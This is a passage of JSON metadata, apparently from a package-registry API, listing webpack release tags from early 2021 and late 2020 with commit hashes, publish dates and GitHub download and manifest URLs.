ebpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/